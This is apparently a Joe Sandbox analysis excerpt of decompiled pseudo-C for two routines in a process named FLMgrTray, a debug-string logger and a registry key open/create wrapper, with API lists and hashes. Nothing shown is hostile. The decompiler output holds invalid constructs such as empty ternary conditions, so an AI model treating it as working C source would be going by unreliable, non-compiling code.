                                                                                        				signed int _v2096;
                                                                                        				int _v2100;
                                                                                        				short _v2116;
                                                                                        				signed int _v2120;
                                                                                        				int _v2124;
                                                                                        				char _v2140;
                                                                                        				signed int _v2144;
                                                                                        				int _v2148;
                                                                                        				short _v2164;
                                                                                        				intOrPtr _v2168;
                                                                                        				char _v2188;
                                                                                        				int _v2192;
                                                                                        				void* __ebp;
                                                                                        				signed int _t91;
                                                                                        				signed int _t92;
                                                                                        				intOrPtr _t100;
                                                                                        				intOrPtr _t104;
                                                                                        				short* _t111;
                                                                                        				short* _t116;
                                                                                        				intOrPtr _t131;
                                                                                        				intOrPtr _t134;
                                                                                        				intOrPtr _t137;
                                                                                        				intOrPtr _t140;
                                                                                        				void* _t143;
                                                                                        				intOrPtr* _t151;
                                                                                        				int _t160;
                                                                                        				intOrPtr _t170;
                                                                                        				intOrPtr _t171;
                                                                                        				short _t172;
                                                                                        				short _t173;
                                                                                        				void* _t174;
                                                                                        				void* _t176;
                                                                                        				int _t177;
                                                                                        				int _t178;
                                                                                        				signed int _t179;
                                                                                        				signed int _t180;
                                                                                        				intOrPtr _t181;
                                                                                        				signed int _t182;
                                                                                        				void* _t183;
                                                                                        				void* _t184;
                                                                                        				void* _t185;
                                                                                        				void* _t186;
                                                                                        				signed int _t190;
                                                                                        				void* _t191;
                                                                                        				void* _t193;
                                                                                        				void* _t194;
                                                                                        				void* _t196;
                                                                                        				void* _t197;
                                                                                        
                                                                                        				_t188 = __edi;
                                                                                        				_t150 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E2CE);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t91 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t92 = _t91 ^ _t190;
                                                                                        				_v20 = _t92;
                                                                                        				_push(_t92);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v2192 = 0;
                                                                                        				memset( &_v2068, 0, 0x400);
                                                                                        				_t193 = _t191 - 0x880 + 0xc;
                                                                                        				wvsprintfW( &_v2068, _a4,  &_a8);
                                                                                        				_v2100 = 0;
                                                                                        				_t151 =  &_v2068;
                                                                                        				_v2096 = 7;
                                                                                        				_v2116 = 0;
                                                                                        				_t176 = _t151 + 2;
                                                                                        				do {
                                                                                        					_t100 =  *_t151;
                                                                                        					_t151 = _t151 + 2;
                                                                                        				} while (_t100 != 0);
                                                                                        				_push(_t151 - _t176 >> 1);
                                                                                        				E00163540(__ebx, _t176, __edi,  &_v2068);
                                                                                        				_v8 = 1;
                                                                                        				_v2164 = 0;
                                                                                        				_t104 =  *0x19d0e4; // 0xd
                                                                                        				_v2148 = 0;
                                                                                        				_v2144 = 7;
                                                                                        				_v2192 = 1;
                                                                                        				E0016A8A0( &_v2164, _t104 + 1);
                                                                                        				E001632D0(__ebx,  &_v2164, __edi, 0x190fa4, 1);
                                                                                        				_t109 =  >=  ?  *0x19d0d4 : 0x19d0d4;
                                                                                        				E001632D0(__ebx,  &_v2164, __edi,  >=  ?  *0x19d0d4 : 0x19d0d4,  *0x19d0e4);
                                                                                        				_t111 = E001632D0(_t150,  &_v2164, _t188, 0x190f9c, 2);
                                                                                        				_v2076 = 0;
                                                                                        				_v2072 = 0;
                                                                                        				_v2192 = 3;
                                                                                        				asm("movups xmm0, [eax]");
                                                                                        				asm("movups [ebp-0x828], xmm0");
                                                                                        				asm("movq xmm0, [eax+0x10]");
                                                                                        				asm("movq [ebp-0x818], xmm0");
                                                                                        				 *(_t111 + 0x10) = 0;
                                                                                        				 *(_t111 + 0x14) = 7;
                                                                                        				 *_t111 = 0;
                                                                                        				_t160 = _v2076;
                                                                                        				_t177 = _v2100;
                                                                                        				_v8 = 2;
                                                                                        				if(_t177 <= _v2072 - _t160 || _v2096 - _t177 < _t160) {
                                                                                        					_t115 =  >=  ? _v2116 :  &_v2116;
                                                                                        					_t116 = E001632D0(_t150,  &_v2092, _t188,  >=  ? _v2116 :  &_v2116, _t177);
                                                                                        				} else {
                                                                                        					_push(_t160);
                                                                                        					_t149 =  >=  ? _v2092 :  &_v2092;
                                                                                        					_push( >=  ? _v2092 :  &_v2092);
                                                                                        					_t116 = E00182060(_t150,  &_v2116, _t188, __esi, 0);
                                                                                        				}
                                                                                        				_v2124 = 0;
                                                                                        				_v2120 = 0;
                                                                                        				asm("movups xmm0, [eax]");
                                                                                        				asm("movups [ebp-0x858], xmm0");
                                                                                        				asm("movq xmm0, [eax+0x10]");
                                                                                        				asm("movq [ebp-0x848], xmm0");
                                                                                        				 *(_t116 + 0x10) = 0;
                                                                                        				 *(_t116 + 0x14) = 7;
                                                                                        				 *_t116 = 0;
                                                                                        				_t178 = _v2072;
                                                                                        				_v8 = 4;
                                                                                        				if(_t178 >= 8) {
                                                                                        					E00175733(_t143, _t174);
                                                                                        					_t193 = _t193 + 8;
                                                                                        				}
                                                                                        				_v2076 = 0;
                                                                                        				_v2072 = 7;
                                                                                        				_v2092 = 0;
                                                                                        				_t179 = _v2144;
                                                                                        				_v8 = 5;
                                                                                        				if(_t179 >= 8) {
                                                                                        					_t173 = _v2164;
                                                                                        					_t186 = 2 + _t179 * 2;
                                                                                        					_t140 = _t173;
                                                                                        					if(_t186 >= 0x1000) {
                                                                                        						_t173 =  *((intOrPtr*)(_t173 - 4));
                                                                                        						_t186 = _t186 + 0x23;
                                                                                        						if(_t140 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t186);
                                                                                        					E00175733(_t140, _t173);
                                                                                        					_t193 = _t193 + 8;
                                                                                        				}
                                                                                        				_v2148 = 0;
                                                                                        				_v2144 = 7;
                                                                                        				_v2164 = 0;
                                                                                        				_t180 = _v2096;
                                                                                        				_v8 = 6;
                                                                                        				if(_t180 >= 8) {
                                                                                        					_t172 = _v2116;
                                                                                        					_t185 = 2 + _t180 * 2;
                                                                                        					_t137 = _t172;
                                                                                        					if(_t185 >= 0x1000) {
                                                                                        						_t172 =  *((intOrPtr*)(_t172 - 4));
                                                                                        						_t185 = _t185 + 0x23;
                                                                                        						if(_t137 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t185);
                                                                                        					E00175733(_t137, _t172);
                                                                                        					_t193 = _t193 + 8;
                                                                                        				}
                                                                                        				_v2100 = 0;
                                                                                        				_v2116 = 0;
                                                                                        				_t121 =  >=  ? _v2140 :  &_v2140;
                                                                                        				_v2096 = 7;
                                                                                        				OutputDebugStringW( >=  ? _v2140 :  &_v2140); // executed
                                                                                        				E001632D0(_t150,  &_v2140, _t188, 0x190fa8, 1);
                                                                                        				_t194 = _t193 - 0x18;
                                                                                        				E0016C3D0(_t194,  &_v2140);
                                                                                        				_push( &_v2188);
                                                                                        				_push(E00184770(_t194));
                                                                                        				_t196 = _t194 + 0x1c - 0x18;
                                                                                        				_v8 = 7;
                                                                                        				E0016C3D0(_t196, 0x19d0ec);
                                                                                        				E00185680(_t150);
                                                                                        				_t181 = _v2168;
                                                                                        				_t197 = _t196 + 0x1c;
                                                                                        				if(_t181 >= 0x10) {
                                                                                        					_t171 = _v2188;
                                                                                        					_t184 = _t181 + 1;
                                                                                        					_t134 = _t171;
                                                                                        					if(_t184 >= 0x1000) {
                                                                                        						_t171 =  *((intOrPtr*)(_t171 - 4));
                                                                                        						_t184 = _t184 + 0x23;
                                                                                        						if(_t134 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t184);
                                                                                        					E00175733(_t134, _t171);
                                                                                        					_t197 = _t197 + 8;
                                                                                        				}
                                                                                        				_t182 = _v2120;
                                                                                        				if(_t182 >= 8) {
                                                                                        					_t170 = _v2140;
                                                                                        					_t183 = 2 + _t182 * 2;
                                                                                        					_t131 = _t170;
                                                                                        					if(_t183 >= 0x1000) {
                                                                                        						_t170 =  *((intOrPtr*)(_t170 - 4));
                                                                                        						_t183 = _t183 + 0x23;
                                                                                        						if(_t131 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t183);
                                                                                        					E00175733(_t131, _t170);
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t190);
                                                                                        			}


























































                                                                                        0x00181b20
                                                                                        0x00181b20
                                                                                        0x00181b23
                                                                                        0x00181b25
                                                                                        0x00181b30
                                                                                        0x00181b37
                                                                                        0x00181b3c
                                                                                        0x00181b3e
                                                                                        0x00181b41
                                                                                        0x00181b45
                                                                                        0x00181b56
                                                                                        0x00181b63
                                                                                        0x00181b68
                                                                                        0x00181b79
                                                                                        0x00181b81
                                                                                        0x00181b8b
                                                                                        0x00181b91
                                                                                        0x00181b9b
                                                                                        0x00181ba2
                                                                                        0x00181ba5
                                                                                        0x00181ba5
                                                                                        0x00181ba8
                                                                                        0x00181bab
                                                                                        0x00181bba
                                                                                        0x00181bc2
                                                                                        0x00181bc9
                                                                                        0x00181bd0
                                                                                        0x00181bdd
                                                                                        0x00181be3
                                                                                        0x00181bee
                                                                                        0x00181bf8
                                                                                        0x00181c02
                                                                                        0x00181c14
                                                                                        0x00181c31
                                                                                        0x00181c39
                                                                                        0x00181c4b
                                                                                        0x00181c50
                                                                                        0x00181c5c
                                                                                        0x00181c66
                                                                                        0x00181c70
                                                                                        0x00181c73
                                                                                        0x00181c7a
                                                                                        0x00181c7f
                                                                                        0x00181c87
                                                                                        0x00181c8e
                                                                                        0x00181c95
                                                                                        0x00181c9e
                                                                                        0x00181ca6
                                                                                        0x00181cac
                                                                                        0x00181cb2
                                                                                        0x00181cf3
                                                                                        0x00181d01
                                                                                        0x00181cc0
                                                                                        0x00181ccd
                                                                                        0x00181cce
                                                                                        0x00181cdb
                                                                                        0x00181cde
                                                                                        0x00181cde
                                                                                        0x00181d06
                                                                                        0x00181d12
                                                                                        0x00181d1c
                                                                                        0x00181d1f
                                                                                        0x00181d26
                                                                                        0x00181d2b
                                                                                        0x00181d33
                                                                                        0x00181d3a
                                                                                        0x00181d41
                                                                                        0x00181d44
                                                                                        0x00181d4a
                                                                                        0x00181d51
                                                                                        0x00181d82
                                                                                        0x00181d87
                                                                                        0x00181d87
                                                                                        0x00181d8c
                                                                                        0x00181d96
                                                                                        0x00181da0
                                                                                        0x00181da7
                                                                                        0x00181dad
                                                                                        0x00181db4
                                                                                        0x00181db6
                                                                                        0x00181dbc
                                                                                        0x00181dc3
                                                                                        0x00181dcb
                                                                                        0x00181dcd
                                                                                        0x00181dd0
                                                                                        0x00181ddb
                                                                                        0x00181ddd
                                                                                        0x00181ddd
                                                                                        0x00181ddb
                                                                                        0x00181de3
                                                                                        0x00181de5
                                                                                        0x00181dea
                                                                                        0x00181dea
                                                                                        0x00181def
                                                                                        0x00181df9
                                                                                        0x00181e03
                                                                                        0x00181e0a
                                                                                        0x00181e10
                                                                                        0x00181e17
                                                                                        0x00181e19
                                                                                        0x00181e1f
                                                                                        0x00181e26
                                                                                        0x00181e2e
                                                                                        0x00181e30
                                                                                        0x00181e33
                                                                                        0x00181e3e
                                                                                        0x00181e40
                                                                                        0x00181e40
                                                                                        0x00181e3e
                                                                                        0x00181e46
                                                                                        0x00181e48
                                                                                        0x00181e4d
                                                                                        0x00181e4d
                                                                                        0x00181e52
                                                                                        0x00181e63
                                                                                        0x00181e70
                                                                                        0x00181e78
                                                                                        0x00181e82
                                                                                        0x00181e95
                                                                                        0x00181e9a
                                                                                        0x00181ea6
                                                                                        0x00181eb1
                                                                                        0x00181eba
                                                                                        0x00181ebb
                                                                                        0x00181ebe
                                                                                        0x00181ec9
                                                                                        0x00181ece
                                                                                        0x00181ed3
                                                                                        0x00181ed9
                                                                                        0x00181edf
                                                                                        0x00181ee1
                                                                                        0x00181ee7
                                                                                        0x00181ee8
                                                                                        0x00181ef0
                                                                                        0x00181ef2
                                                                                        0x00181ef5
                                                                                        0x00181f00
                                                                                        0x00181f02
                                                                                        0x00181f02
                                                                                        0x00181f00
                                                                                        0x00181f08
                                                                                        0x00181f0a
                                                                                        0x00181f0f
                                                                                        0x00181f0f
                                                                                        0x00181f12
                                                                                        0x00181f1b
                                                                                        0x00181f1d
                                                                                        0x00181f23
                                                                                        0x00181f2a
                                                                                        0x00181f32
                                                                                        0x00181f34
                                                                                        0x00181f37
                                                                                        0x00181f42
                                                                                        0x00181f44
                                                                                        0x00181f44
                                                                                        0x00181f42
                                                                                        0x00181f4a
                                                                                        0x00181f4c
                                                                                        0x00181f51
                                                                                        0x00181f59
                                                                                        0x00181f6e

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(?,00000000), ref: 00181B63
                                                                                        • wvsprintfW.USER32(?,?,?), ref: 00181B79
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00190F9C,00000002,0019D0D4,00190FA4,00000001,0000000E,?,?), ref: 00181D7A
                                                                                          • Part of subcall function 001632D0: memmove.VCRUNTIME140(?,00000000,?,00000005,00000000,00000000), ref: 0016330F
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00190F9C,00000002,0019D0D4,00190FA4,00000001,0000000E,?,?), ref: 00181DDD
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00190F9C,00000002,0019D0D4,00190FA4,00000001,0000000E,?,?), ref: 00181E40
                                                                                        • OutputDebugStringW.KERNEL32(?,?,00000000,00190F9C,00000002,0019D0D4,00190FA4,00000001,0000000E,?,?), ref: 00181E82
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00181F02
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00181F44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$DebugOutputStringmemmovememsetwvsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 225709192-0
                                                                                        • Opcode ID: e296ef3f13b5985d8e28624a22aa430dd753495211c0960629c30c48934164c7
                                                                                        • Instruction ID: 57e12fd48d1491a27a6838ff69d72e4a2192e1df2073650b0e62e2aedec94e41
                                                                                        • Opcode Fuzzy Hash: e296ef3f13b5985d8e28624a22aa430dd753495211c0960629c30c48934164c7
                                                                                        • Instruction Fuzzy Hash: EAB18771A00218DADB24EB64CC89BADB7B5FB48304F10C2D9E449A7291DF74ABC5CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 56%
                                                                                        			E001829D0(void** __ecx, intOrPtr* _a4, char _a8) {
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				char _v44;
                                                                                        				signed int _v48;
                                                                                        				int _v52;
                                                                                        				short _v68;
                                                                                        				signed int _v72;
                                                                                        				int _v76;
                                                                                        				short _v92;
                                                                                        				signed int _v96;
                                                                                        				char _v116;
                                                                                        				void* _v120;
                                                                                        				int _v124;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t84;
                                                                                        				signed int _t85;
                                                                                        				intOrPtr _t88;
                                                                                        				void* _t93;
                                                                                        				long _t94;
                                                                                        				intOrPtr _t97;
                                                                                        				void* _t107;
                                                                                        				void* _t109;
                                                                                        				intOrPtr _t113;
                                                                                        				intOrPtr _t116;
                                                                                        				intOrPtr _t119;
                                                                                        				void* _t122;
                                                                                        				signed int _t123;
                                                                                        				signed int _t124;
                                                                                        				void* _t128;
                                                                                        				signed int _t129;
                                                                                        				signed int _t130;
                                                                                        				intOrPtr* _t133;
                                                                                        				short* _t139;
                                                                                        				char _t144;
                                                                                        				intOrPtr _t149;
                                                                                        				short _t150;
                                                                                        				short _t151;
                                                                                        				short* _t153;
                                                                                        				signed int _t158;
                                                                                        				void* _t159;
                                                                                        				signed int _t160;
                                                                                        				signed int _t161;
                                                                                        				void* _t162;
                                                                                        				void* _t163;
                                                                                        				void* _t168;
                                                                                        				void** _t171;
                                                                                        				signed int _t173;
                                                                                        				void* _t174;
                                                                                        				void* _t175;
                                                                                        				void* _t176;
                                                                                        				void* _t177;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E3D8);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t175 = _t174 - 0x70;
                                                                                        				_t84 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t85 = _t84 ^ _t173;
                                                                                        				_v20 = _t85;
                                                                                        				_push(_t128);
                                                                                        				_push(_t85);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t171 = __ecx;
                                                                                        				_t156 = _a4;
                                                                                        				_t133 = _a4;
                                                                                        				_v120 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v24 = 7;
                                                                                        				_v44 = 0;
                                                                                        				_t8 = _t133 + 2; // 0x2
                                                                                        				_t168 = _t8;
                                                                                        				goto L1;
                                                                                        				L4:
                                                                                        				if(_a8 == 0 || _v28 == 0) {
                                                                                        					__eflags = _v24 - 8;
                                                                                        					_t93 =  *_t171;
                                                                                        					_t139 =  >=  ? _v44 :  &_v44;
                                                                                        					__eflags = _t93;
                                                                                        					if(_t93 == 0) {
                                                                                        						L12:
                                                                                        						_t93 = _t171[1];
                                                                                        						L13:
                                                                                        						_t157 =  &_v120;
                                                                                        						_t94 = RegOpenKeyExW(_t93, _t139, 0, _t171[0xa],  &_v120); // executed
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					__eflags = _t129;
                                                                                        					if(_t129 != 0) {
                                                                                        						goto L13;
                                                                                        					}
                                                                                        					goto L12;
                                                                                        				} else {
                                                                                        					_t122 =  *_t171;
                                                                                        					_t153 =  >=  ? _v44 :  &_v44;
                                                                                        					if(_t122 == 0 || _t129 == 0) {
                                                                                        						_t122 = _t171[1];
                                                                                        					}
                                                                                        					_t157 =  &_v120;
                                                                                        					_t94 = RegCreateKeyExW(_t122, _t153, 0, 0, 0, _t171[0xa], 0,  &_v120,  &_v124); // executed
                                                                                        					L14:
                                                                                        					_t171[0xb] = _t94;
                                                                                        					_t130 = _t129 & 0xffffff00 | _t94 == 0x00000000;
                                                                                        					if(_t130 != 0) {
                                                                                        						if( *_t171 != 0) {
                                                                                        							_t193 = _t130;
                                                                                        							if(_t130 != 0) {
                                                                                        								E0016C3D0( &_v116,  &(_t171[3]));
                                                                                        								_v8 = 1;
                                                                                        								_t107 = E001824F0(_t193,  &_v92,  &_v116, 0x5c);
                                                                                        								_v8 = 2;
                                                                                        								_t109 = E00182490( &_v68, _t107,  &_v44);
                                                                                        								_t177 = _t177 + 0x18;
                                                                                        								E00176890( &_v44, _t109);
                                                                                        								_t160 = _v48;
                                                                                        								if(_t160 >= 8) {
                                                                                        									_t151 = _v68;
                                                                                        									_t163 = 2 + _t160 * 2;
                                                                                        									_t119 = _t151;
                                                                                        									if(_t163 >= 0x1000) {
                                                                                        										_t151 =  *((intOrPtr*)(_t151 - 4));
                                                                                        										_t163 = _t163 + 0x23;
                                                                                        										if(_t119 > 0x1f) {
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										}
                                                                                        									}
                                                                                        									_push(_t163);
                                                                                        									E00175733(_t119, _t151);
                                                                                        									_t177 = _t177 + 8;
                                                                                        								}
                                                                                        								_t161 = _v72;
                                                                                        								_v52 = 0;
                                                                                        								_v48 = 7;
                                                                                        								_v68 = 0;
                                                                                        								_v8 = 1;
                                                                                        								if(_t161 >= 8) {
                                                                                        									_t150 = _v92;
                                                                                        									_t162 = 2 + _t161 * 2;
                                                                                        									_t116 = _t150;
                                                                                        									if(_t162 >= 0x1000) {
                                                                                        										_t150 =  *((intOrPtr*)(_t150 - 4));
                                                                                        										_t162 = _t162 + 0x23;
                                                                                        										if(_t116 > 0x1f) {
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										}
                                                                                        									}
                                                                                        									_push(_t162);
                                                                                        									E00175733(_t116, _t150);
                                                                                        									_t177 = _t177 + 8;
                                                                                        								}
                                                                                        								_t157 = _v96;
                                                                                        								_v76 = 0;
                                                                                        								_v72 = 7;
                                                                                        								_v92 = 0;
                                                                                        								_v8 = 0;
                                                                                        								if(_t157 >= 8) {
                                                                                        									_t149 = _v116;
                                                                                        									_t157 = 2 + _t157 * 2;
                                                                                        									_t113 = _t149;
                                                                                        									if(_t157 >= 0x1000) {
                                                                                        										_t149 =  *((intOrPtr*)(_t149 - 4));
                                                                                        										_t157 = _t157 + 0x23;
                                                                                        										if(_t113 > 0x1f) {
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										}
                                                                                        									}
                                                                                        									_push(_t157);
                                                                                        									E00175733(_t113, _t149);
                                                                                        									_t177 = _t177 + 8;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						_t101 =  >=  ? _v44 :  &_v44;
                                                                                        						E00182740(_t171, _t157, _v120,  >=  ? _v44 :  &_v44);
                                                                                        					}
                                                                                        					_t158 = _v24;
                                                                                        					if(_t158 >= 8) {
                                                                                        						_t144 = _v44;
                                                                                        						_t159 = 2 + _t158 * 2;
                                                                                        						_t97 = _t144;
                                                                                        						if(_t159 >= 0x1000) {
                                                                                        							_t144 =  *((intOrPtr*)(_t144 - 4));
                                                                                        							_t159 = _t159 + 0x23;
                                                                                        							if(_t97 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t159);
                                                                                        						E00175733(_t97, _t144);
                                                                                        					}
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return E001755F4(_v20 ^ _t173);
                                                                                        				}
                                                                                        				L1:
                                                                                        				_t88 =  *_t133;
                                                                                        				_t133 = _t133 + 2;
                                                                                        				if(_t88 != 0) {
                                                                                        					goto L1;
                                                                                        				} else {
                                                                                        					_push(_t133 - _t168 >> 1);
                                                                                        					E00163540(_t128, _t156, _t168, _t156);
                                                                                        					_t176 = _t175 - 0x18;
                                                                                        					_v8 = 0;
                                                                                        					E0016C3D0(_t176,  &_v44);
                                                                                        					_t129 = E001828A0(_t156, _t168);
                                                                                        					_v124 = 0;
                                                                                        					_t177 = _t176 + 0x18;
                                                                                        					if(_t129 == 0) {
                                                                                        						_t123 = _v28;
                                                                                        						_t166 =  <  ? _t123 : 1;
                                                                                        						_t155 =  >=  ? _v44 :  &_v44;
                                                                                        						_t124 = _t123 - 1;
                                                                                        						_v28 = _t124;
                                                                                        						memmove( >=  ? _v44 :  &_v44, ( >=  ? _v44 :  &_v44) + ( <  ? _t123 : 1) * 2, 2 + _t124 * 2);
                                                                                        						_t177 = _t177 + 0xc;
                                                                                        					}
                                                                                        					goto L4;
                                                                                        				}
                                                                                        			}



























































                                                                                        0x001829d3
                                                                                        0x001829d5
                                                                                        0x001829e0
                                                                                        0x001829e1
                                                                                        0x001829e4
                                                                                        0x001829e9
                                                                                        0x001829eb
                                                                                        0x001829ee
                                                                                        0x001829f1
                                                                                        0x001829f5
                                                                                        0x001829fb
                                                                                        0x001829fd
                                                                                        0x00182a02
                                                                                        0x00182a04
                                                                                        0x00182a0b
                                                                                        0x00182a12
                                                                                        0x00182a19
                                                                                        0x00182a1d
                                                                                        0x00182a1d
                                                                                        0x00182a1d
                                                                                        0x00182a95
                                                                                        0x00182a99
                                                                                        0x00182ad6
                                                                                        0x00182add
                                                                                        0x00182adf
                                                                                        0x00182ae3
                                                                                        0x00182ae5
                                                                                        0x00182aeb
                                                                                        0x00182aeb
                                                                                        0x00182aee
                                                                                        0x00182aee
                                                                                        0x00182af9
                                                                                        0x00000000
                                                                                        0x00182af9
                                                                                        0x00182ae7
                                                                                        0x00182ae9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00182aa1
                                                                                        0x00182aa8
                                                                                        0x00182aaa
                                                                                        0x00182ab0
                                                                                        0x00182ab6
                                                                                        0x00182ab6
                                                                                        0x00182abd
                                                                                        0x00182ace
                                                                                        0x00182aff
                                                                                        0x00182b01
                                                                                        0x00182b04
                                                                                        0x00182b09
                                                                                        0x00182b12
                                                                                        0x00182b18
                                                                                        0x00182b1a
                                                                                        0x00182b27
                                                                                        0x00182b31
                                                                                        0x00182b3a
                                                                                        0x00182b42
                                                                                        0x00182b4c
                                                                                        0x00182b51
                                                                                        0x00182b58
                                                                                        0x00182b5d
                                                                                        0x00182b63
                                                                                        0x00182b65
                                                                                        0x00182b68
                                                                                        0x00182b6f
                                                                                        0x00182b77
                                                                                        0x00182b79
                                                                                        0x00182b7c
                                                                                        0x00182b87
                                                                                        0x00182b89
                                                                                        0x00182b89
                                                                                        0x00182b87
                                                                                        0x00182b8f
                                                                                        0x00182b91
                                                                                        0x00182b96
                                                                                        0x00182b96
                                                                                        0x00182b99
                                                                                        0x00182b9e
                                                                                        0x00182ba5
                                                                                        0x00182bac
                                                                                        0x00182bb0
                                                                                        0x00182bb7
                                                                                        0x00182bb9
                                                                                        0x00182bbc
                                                                                        0x00182bc3
                                                                                        0x00182bcb
                                                                                        0x00182bcd
                                                                                        0x00182bd0
                                                                                        0x00182bdb
                                                                                        0x00182bdd
                                                                                        0x00182bdd
                                                                                        0x00182bdb
                                                                                        0x00182be3
                                                                                        0x00182be5
                                                                                        0x00182bea
                                                                                        0x00182bea
                                                                                        0x00182bed
                                                                                        0x00182bf2
                                                                                        0x00182bf9
                                                                                        0x00182c00
                                                                                        0x00182c04
                                                                                        0x00182c0a
                                                                                        0x00182c0c
                                                                                        0x00182c0f
                                                                                        0x00182c16
                                                                                        0x00182c1e
                                                                                        0x00182c20
                                                                                        0x00182c23
                                                                                        0x00182c2e
                                                                                        0x00182c30
                                                                                        0x00182c30
                                                                                        0x00182c2e
                                                                                        0x00182c36
                                                                                        0x00182c38
                                                                                        0x00182c3d
                                                                                        0x00182c3d
                                                                                        0x00182c0a
                                                                                        0x00182b1a
                                                                                        0x00182c49
                                                                                        0x00182c51
                                                                                        0x00182c51
                                                                                        0x00182c56
                                                                                        0x00182c5c
                                                                                        0x00182c5e
                                                                                        0x00182c61
                                                                                        0x00182c68
                                                                                        0x00182c70
                                                                                        0x00182c72
                                                                                        0x00182c75
                                                                                        0x00182c80
                                                                                        0x00182c82
                                                                                        0x00182c82
                                                                                        0x00182c80
                                                                                        0x00182c88
                                                                                        0x00182c8a
                                                                                        0x00182c8f
                                                                                        0x00182c97
                                                                                        0x00182caf
                                                                                        0x00182caf
                                                                                        0x00182a20
                                                                                        0x00182a20
                                                                                        0x00182a23
                                                                                        0x00182a29
                                                                                        0x00000000
                                                                                        0x00182a2b
                                                                                        0x00182a2f
                                                                                        0x00182a34
                                                                                        0x00182a39
                                                                                        0x00182a3c
                                                                                        0x00182a49
                                                                                        0x00182a53
                                                                                        0x00182a55
                                                                                        0x00182a5c
                                                                                        0x00182a61
                                                                                        0x00182a63
                                                                                        0x00182a70
                                                                                        0x00182a77
                                                                                        0x00182a7b
                                                                                        0x00182a7d
                                                                                        0x00182a8d
                                                                                        0x00182a92
                                                                                        0x00182a92
                                                                                        0x00000000
                                                                                        0x00182a61

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(000000FF,00000000,00000000), ref: 00182A8D
                                                                                        • RegCreateKeyExW.KERNEL32(?,000000FF,00000000,00000000,00000000,?,00000000,?,?), ref: 00182ACE
                                                                                        • RegOpenKeyExW.KERNEL32(?,000000FF,00000000,?,?), ref: 00182AF9
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 00182B89
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 00182BDD
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 00182C30
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,000000FF), ref: 00182C82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
